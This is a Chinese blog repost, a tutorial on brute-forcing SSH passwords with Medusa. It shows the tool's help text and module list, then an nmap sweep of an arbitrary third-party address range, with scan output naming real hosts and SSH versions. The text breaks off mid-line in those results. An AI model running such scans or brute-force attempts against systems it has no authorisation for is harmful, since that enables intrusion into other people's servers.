欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

medusa破解ssh密码

程序员文章站 2022-04-22 18:38:47
From 一不小心高潮了blog 蛋疼,随手写一下,medusa破解起来还是比较快的,首先我们看看帮助 root@perl-exploit:/pentest/exploits/framew...

From 一不小心高潮了blog

蛋疼,随手写一下,medusa破解起来还是比较快的,首先我们看看帮助

root@perl-exploit:/pentest/exploits/framework3# medusa
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ALERT: Host information must be supplied.

Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
-h [TEXT]    : Target hostname or IP address
-H [FILE]    : File containing target hostnames or IP addresses
-u [TEXT]    : Username to test
-U [FILE]    : File containing usernames to test
-p [TEXT]    : Password to test
-P [FILE]    : File containing passwords to test
-C [FILE]    : File containing combo entries. See README for more information.
-O [FILE]    : File to append log information to
-e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)
-M [TEXT]    : Name of the module to execute (without the .mod extension)
-m [TEXT]    : Parameter to pass to the module. This can be passed multiple times with a
                 different parameter each time and they will all be sent to the module (i.e.
                 -m Param1 -m Param2, etc.)
-d           : Dump all known modules
-n [NUM]     : Use for non-default TCP port number
-s           : Enable SSL
-g [NUM]     : Give up after trying to connect for NUM seconds (default 3)
-r [NUM]     : Sleep NUM seconds between retry attempts (default 3)
-R [NUM]     : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
-t [NUM]     : Total number of logins to be tested concurrently
-T [NUM]     : Total number of hosts to be tested concurrently
-L           : Parallelize logins using one username per thread. The default is to process
                 the entire username before proceeding.
-f           : Stop scanning host after first valid username/password found.
-F           : Stop audit after first valid username/password found on any host.
-b           : Suppress startup banner
-q           : Display modules usage information
-v [NUM]     : Verbose level [0 - 6 (more)]
-w [NUM]     : Error debug level [0 - 10 (more)]
-V           : Display version
-Z [NUM]     : Resume scan from host #

ok,我们看看medusa有哪些模块支持什么功能的破解

root@perl-exploit:/pentest/exploits/framework3# medusa -d
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

Available modules in "." :

Available modules in "/usr/lib/medusa/modules" :
    + cvs.mod : Brute force module for CVS sessions : version 1.0.0
    + ftp.mod : Brute force module for FTP/FTPS sessions : version 1.3.0
    + http.mod : Brute force module for HTTP : version 1.3.0
    + imap.mod : Brute force module for IMAP sessions : version 1.2.0
    + mssql.mod : Brute force module for M$-SQL sessions : version 1.1.1
    + mysql.mod : Brute force module for MySQL sessions : version 1.2
    + ncp.mod : Brute force module for NCP sessions : version 1.0.0
    + nntp.mod : Brute force module for NNTP sessions : version 1.0.0
    + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 1.0.2
    + pop3.mod : Brute force module for POP3 sessions : version 1.2
    + postgres.mod : Brute force module for PostgreSQL sessions : version 1.0.0
    + rexec.mod : Brute force module for REXEC sessions : version 1.1.1
    + rlogin.mod : Brute force module for RLOGIN sessions : version 1.0.2
    + rsh.mod : Brute force module for RSH sessions : version 1.0.1
    + smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 1.5
    + smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 1.0.0
    + smtp.mod : Brute force module for SMTP Authentication with TLS : version 1.0.0
    + snmp.mod : Brute force module for SNMP Community Strings : version 1.0.0
    + ssh.mod : Brute force module for SSH v2 sessions : version 1.0.2
    + svn.mod : Brute force module for Subversion sessions : version 1.0.0
    + telnet.mod : Brute force module for telnet sessions : version 1.2.2
    + vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 1.0.1
    + vnc.mod : Brute force module for VNC sessions : version 1.0.1
    + web-form.mod : Brute force module for web forms : version 1.0.0
    + wrapper.mod : Generic Wrapper Module : version 1.0.1

恩,我们要破解ssh,所以用-M ssh参数加载ssh模块,后面不用跟.mod

首先我们确定目标,扫描开放ssh的机器,随便找个段扫描一下吧

root@perl-exploit:/pentest# nmap -sV -p22 -oG ssh 69.163.190.0/24

然后是漫长的等待,上面的参数扫描意思是,扫描整个段开了22端口的机器,并且判断服务版本,保存到ssh文件中。

然后我们查看扫描结果

root@perl-exploit:/pentest# cat ssh
# Nmap 5.00 scan initiated Tue Jun 22 02:18:28 2010 as: nmap -sV -p22 -oG ssh 69.163.190.0/24
Host: 69.163.190.1 (ip-69-163-190-1.dreamhost.com) Ports: 22/closed/tcp//ssh///
Host: 69.163.190.2 (ip-69-163-190-2.dreamhost.com) Ports: 22/closed/tcp//ssh///
Host: 69.163.190.3 (ip-69-163-190-3.dreamhost.com) Ports: 22/closed/tcp//ssh///
Host: 69.163.190.4 (dragich.shaggy.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.5 (myrck.spongebob.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.6 (apache2-twang.luthor.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.7 (ps11591.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.8 (ps10854.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.9 (rangerjill.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.10 (ouellette.yogi.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.11 (psmysql11957.dreamhostps.com) Ports: 22/open/tcp//ssh//OpenSSH 4.3p2 Debian 9etch2 (protocol 2.0)/
Host: 69.163.190.12 (rubeo.yogi.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p